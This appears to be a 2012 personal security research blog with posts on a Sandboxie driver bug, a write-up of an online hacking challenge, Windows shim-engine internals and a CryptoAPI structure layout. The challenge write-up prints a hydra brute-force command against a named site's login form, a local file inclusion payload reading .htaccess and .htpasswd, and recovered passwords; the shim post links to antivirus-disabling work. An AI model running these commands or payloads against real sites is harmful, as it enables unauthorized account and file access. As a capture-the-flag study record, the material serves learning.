0x16/7ton

 photo doc155602017_152116624_zpsa322a969.gif

четверг, 13 декабря 2012 г.

Sandboxie ProbeForWrite fail

Main article about it here:
Sandboxie Exploitation 
After some research in sandboxie driver i am found simple vulnerability.
For example in x86 driver(bug exist on both arch model x86 and x64)
See picture:



















If DelayLoadDll structure exist function must write to usermode buffer file path
Show in next picture:

















воскресенье, 21 октября 2012 г.

Attack-Secure Challenge

Recently I have noticed a strange Challenge and decided to pass him :
StrangeChallenge

So we have:
104 116 116 112 58 47 47 100 108 46 100 114 111 112 98 111 120 46 99 111 109 47
117 47 49 48 55 54 49 55 48 48 47 123 99 104 97 108 108 101 110 103 101 46 122
105 112 44 99 104 97 108 108 101 110 103 101 46 98 122 50 44 97 100 109 105 110
46 116 120 116 125


Is simply a sequence of digits in the decimal system, because we translate it into hex and then in ascii
(for example, I quickly wrote a Python script for this )

Obtain this url:
http://dl.dropbox.com/u/10761700/{challenge.zip,challenge.bz2,admin.txt}

Download all that we offer)

  • challenge.zip-zip archive protected with password
  • challenge.bz2-archive contains a file with no extension
  • admin.txt-contains a dictionary of passwords
OK, brute forcing archive with dictionary gave nothing, and then I began to study the file without an extension.The figure shows the file header:















So it is aiff format sound track, after i am change the extension and playing him.
Played 11 seconds artist unknown to me)
The first thought to find the artist, with the help of online services such as:
 

Audio Tag ,midomi etc...
But alas nothing  found.Then i started looking for shorthand methods of concealing information in the track,and a lot of things, learned format. aiff.Also i am asked a friend who have iphone to find the track with  Sound Hound.
Surprise but he quickly found the Executive:it was Terranova-Just Enough.
Also, I studied in detail the dump of the file and found a funny hint comment:








Use this url to easy find the ID of the album:
http://www.freedb.org/freedb_search.php
DiskID: 1603eb03

Ok id it is a pass to encryped archive.
Inside it is challenge.txt've found the contents of this form:

  













It can be seen that it is base64, decode get java script:

var _0x26fe=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x74\x68\x69\x63\x61\x6C\x2D\x69\x6E\x74\x72\x75\x73\x69\x6F\x6E\x2E\x63\x6F\x6D\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70"];
window[_0x26fe[0]]=_0x26fe[1]; 


This script redirects us to the site http://www.ethical-intrusion.com/login.php

Okay we see pass-login form, so times to play with the dictionary :)
I'am brute with hydra like this:
hydra -l admin -P dictionary.txt -s 80 -f www.ethical-intrusion.com http-post-form "/login.php:username=^USER^&password=^PASS^&submit=login:The username/password combination you have entered is invalid"

Bruteforce was a success, and the password was found: m0use456g
Inside was a list of news, one of which was to record video on YouTube with the talking guy)
The problem was that he clearly said the opposite because I downloaded the video and took the track with him and reversed.
In general, he tells me the name of the directory: a98dhkjd

I try to go at it but  www.ethical-intrusion.com/a98dhkjd/
issues me standart apache .htaccess authorization .
Brute forcing gave nothing,and i start began to study the web panel and clearly found in her local inclusion vulnerability (lfi):
http://www.ethical-intrusion.com/index.php?news=[lfi]
Comparing what is known about the directory ,we obtain logical include:
http://www.ethical-intrusion.com/index.php?news=a98dhkjd/.htaccess
It's work :)
       AuthFile a98dhkjd/.htpasswd 
http://www.ethical-intrusion.com/index.php?news=a98dhkjd/.htpasswd 
       pilou:there1s

After authorization we see this text: 
 Wow, seems like you're done?

Jy het die uitdaging suksesvol voltooi.
Die wagwoord is:
"Dit is net die begin."


Google translate say that is
South African dialect,so translate and get it:

You have successfully completed the challenge.
The password is:
"This is just the beginning."


Yeah,it's done:)

среда, 3 октября 2012 г.

A little about shims engine

I begin with such lines from book Windows Internals,Sixth Edition (Mark Russinovich,David A. Solomon,Alex Ionescu) :
"...Additionally,allowing mechanisms such as the shim engine to use its usual hooking and memory-patching techniques on a protected process would result in a security hole if someone could figure how to insert arbitrary shims that modify the behavior of the protected process. Additionally, because the Shim Engine is installed by the parent process, which might not have access to its child protected process,even legitimate shimming cannot work...."
So i am write article about untraditional use shims,read it here: AVkillingWithShims

Good analysis of internals shims may read here:
http://www.alex-ionescu.com/?m=200705
Some additional info.
How work function IsShimInfrastructureDisabled:
It is simple quering reg key,if at least one of the values exist shims engine would not work:
<\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option>
    OptionValue
<\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility>
    DisableAppCompat
<\Registry\MACHINE\Software\Policies\Microsoft\Windows\AppCompat>
    DisableEngine


четверг, 12 апреля 2012 г.

CryptProv struct



HCRYPTPROV+8h  [offset CPGenKey]
HCRYPTPROV+0Ch [
offset CPDeriveKey]
HCRYPTPROV+10h [
offset CPDestroyKey]
HCRYPTPROV+14h [
offset CPSetKeyParam]
HCRYPTPROV+18h [
offset CPGetKeyParam]
HCRYPTPROV+1Ch [
offset CPExportKey]
HCRYPTPROV+20h [
offset CPImportKey]  
HCRYPTPROV+24h [
offset CPEncrypt]
HCRYPTPROV+28h [
offset CPDecrypt]    
HCRYPTPROV+60h [
offset CPDuplicateKey]
HCRYPTPROV+70h addrStruct ^ (a2491d83)
HCRYPTPROV+74h reserved [11111111] 
addrStruct+0h Reserved [DEADBEEF]
addrStruct+4h type
addrStruct+8h Pointer_to_string: "Microsoft DH SChannel Cryptographic Provider"